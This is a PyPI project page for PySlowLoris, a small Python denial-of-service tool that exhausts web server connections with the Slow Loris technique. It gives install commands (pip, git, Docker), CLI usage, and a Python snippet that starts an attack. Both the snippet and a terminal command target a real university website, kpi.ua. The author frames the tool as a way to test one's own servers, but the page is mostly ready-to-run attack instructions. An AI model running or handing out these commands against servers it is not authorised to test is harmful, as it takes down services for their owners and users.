Skip to main content

Small and simple tool for testing Slow Loris vulnerability

Project description

Gitter chat License Python Build Status Requirements Status Code Health PyPI version

This repository was created for testing Slow Loris vulnerability on different web servers. SL based on keeping alive open connection as long as possible and sending some trash headers to the server. If you are interested what I’m trying doing here, please join my team and let’s do fun together. Please DO NOT use this in the real attacks on the servers.

The main reason why I’m writing this module it is to create the easy tool for the fast check a small personal or corporate web server what based on Apache and etc. Also, last but not least reason is to improve my skills in this sphere.

More information you can find here.

Installation

PyPi

To install PySlowLoris, run this command in your terminal:

$ pip install pyslowloris

This is the preferred method to install PySlowLoris, as it will always install the most recent stable release.

Source files

In case you downloaded or cloned the source code from GitHub or your own fork, you can run the following to install cameo for development:

$ git clone https://github.com/[username]/SlowLoris.git
$ cd SlowLoris
$ vitualenv --python=python[version] venv
$ source venv/bin/active
$ pip install --editable .

Docker Hub

Pulling image from Docker Hub and run container:

$ docker pull maxkivich/pyslowloris
$ docker run --rm -it maxkivich/pyslowloris [-h] [-u URL] [-p PORT] [-s SOCKET_COUNT]

Also you can build image from Dockerfile and run container:

$ docker build -t pyslowloris .
$ docker run --rm -it pyslowloris [-h] [-u URL] [-p PORT] [-s SOCKET_COUNT]

Note: Don’t forget about ‘sudo’!

Basic Usage

Available command list:

$ slowloris --help
usage: slowloris [-h] [-u URL] [-s SOCKET_COUNT] [-p PORT]

Small and simple tool for testing Slow Loris vulnerability

optional arguments:
  -h                show this help message and exit
  -u URL            link to the web server (http://google.com) - str
  -s SOCKET_COUNT   maximum count of created connection (default value 300) - int
  -p PORT           port what will be used - int

Using PySlowLoris from code

Here are some example to start attack from Python code

import time
from PySlowLoris import TargetInfo, SlowLorisAttack

target = TargetInfo(url="http://kpi.ua/", port=80)
target.get_info()
slowloris = SlowLorisAttack(target)
slowloris.start_attack() # stop_attack()

while True:
    time.sleep(1)

Using PySlowLoris from terminal

The following command helps to use module from command line

$ slowloris -u http://kpi.ua/ -s 300

stop execution: Ctrl + C

Bugs, issues and contributing

If you find bugs or have suggestions about improving the module, don’t hesitate to contact me.

License

This project is licensed under the MIT License - see the LICENSE file for details

Copyright (c) 2017 Maxim Krivich

maxkrivich.github.io

Project details


Release history Release notifications

This version
History Node

0.1.30

History Node

0.1.29

History Node

0.1.3

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Filename, size & hash SHA256 hash help File type Python version Upload date
PySlowLoris-0.1.30-py2.py3-none-any.whl (18.5 kB) Copy SHA256 hash SHA256 Wheel py2.py3 Aug 31, 2017
PySlowLoris-0.1.30.tar.gz (11.5 kB) Copy SHA256 hash SHA256 Source None Aug 31, 2017

Supported by

Elastic Elastic Search Pingdom Pingdom Monitoring Google Google BigQuery Sentry Sentry Error logging CloudAMQP CloudAMQP RabbitMQ AWS AWS Cloud computing Fastly Fastly CDN DigiCert DigiCert EV certificate StatusPage StatusPage Status page